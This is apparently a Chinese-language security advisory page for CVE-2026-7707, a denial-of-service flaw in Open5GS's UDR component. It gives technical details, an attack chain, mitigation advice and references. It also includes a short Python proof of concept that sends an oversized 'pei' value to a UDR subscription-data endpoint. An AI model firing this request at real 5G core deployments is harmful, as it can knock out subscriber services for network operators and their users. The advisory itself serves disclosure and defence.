CVE-2026-7707 CVSS 4.3 中危

CVE-2026-7707 Open5GS UDR拒绝服务漏洞

披露日期: 2026-05-03

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7707

漏洞类型

拒绝服务

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open5GS

漏洞概述

Open5GS是一款开源的5G核心网实现，近期披露的CVE-2026-7707漏洞存在于其UDR组件的nudr-handler.c文件中。攻击者通过远程操作特定的pei参数，可触发拒绝服务条件。由于该漏洞利用门槛低（仅需低权限）且无需用户交互，加之利用代码已公开，对部署了受影响版本的组织构成了实质性威胁，需立即关注并采取补救措施。

技术细节

CVE-2026-7707漏洞源于Open5GS统一数据存储库（UDR）组件在处理订阅数据时的逻辑缺陷。具体而言，漏洞代码位于/src/udr/nudr-handler.c文件的udr_nudr_dr_handle_subscription_context函数中。该函数在处理外部传入的“pei”（永久设备标识符）参数时，未进行严格的长度限制或格式校验。攻击者可以利用这一缺陷，精心构造包含恶意 payloads 的网络请求，远程发送至目标UDR服务接口。当服务端解析并处理该畸形参数时，可能会触发空指针引用或内存耗尽等底层错误，导致UDR进程异常终止。由于UDR是5G核心网中存储用户数据的关键网元，其崩溃将直接影响网络服务的连续性。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别暴露的Open5GS UDR服务接口及版本信息。

STEP 2

漏洞利用

攻击者向UDR接口发送特制的HTTP/JSON请求，其中包含畸形的'pei'参数。

STEP 3

触发崩溃

UDR组件处理畸形参数时发生错误，导致udr_nudr_dr_handle_subscription_context函数崩溃。

STEP 4

拒绝服务

UDR进程终止，导致5G核心网无法访问用户订阅数据，造成服务中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration (Example, replace with actual target URL)
target_url = "http://192.168.1.100:8000/nudr-dr/v2/subscription-data"

# Malformed 'pei' payload designed to trigger the vulnerability
# The specific format depends on the internal parsing logic of Open5GS
malicious_payload = {
    "ue-id": "imsi-123456789012345",
    "pei": "A" * 10000  # Excessive length or specific pattern causing crash
}

headers = {
    "Content-Type": "application/json",
    "Accept": "application/json"
}

try:
    # Send the malicious request
    response = requests.post(target_url, json=malicious_payload, headers=headers, timeout=5)
    print(f"Request sent, status code: {response.status_code}")
except requests.exceptions.RequestException as e:
    # If the service crashes, the connection might be reset or timeout
    print(f"Exception occurred (potential crash): {e}")

影响范围

Open5GS <= 2.7.7

防御指南

临时缓解措施

建议立即检查Open5GS版本，若受影响应尽快升级。在升级前，可通过防火墙规则严格限制仅允许信任的IP地址访问UDR组件接口，并密切监控UDR进程的运行状态及异常日志。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7707
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7707
3 Details https://www.cvedetails.com/cve/CVE-2026-7707/
4 VulDB https://vuldb.com/cve/CVE-2026-7707
5 Link https://github.com/open5gs/open5gs/
6 Link https://github.com/open5gs/open5gs/issues/4410
7 Link https://github.com/open5gs/open5gs/issues/4411
8 Link https://vuldb.com/submit/805699
9 Link https://vuldb.com/submit/805700
10 Link https://vuldb.com/vuln/360883
11 Link https://vuldb.com/vuln/360883/cti
12 Link https://github.com/open5gs/open5gs/issues/4410
13 Link https://vuldb.com/submit/805699
14 Link https://vuldb.com/submit/805700

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表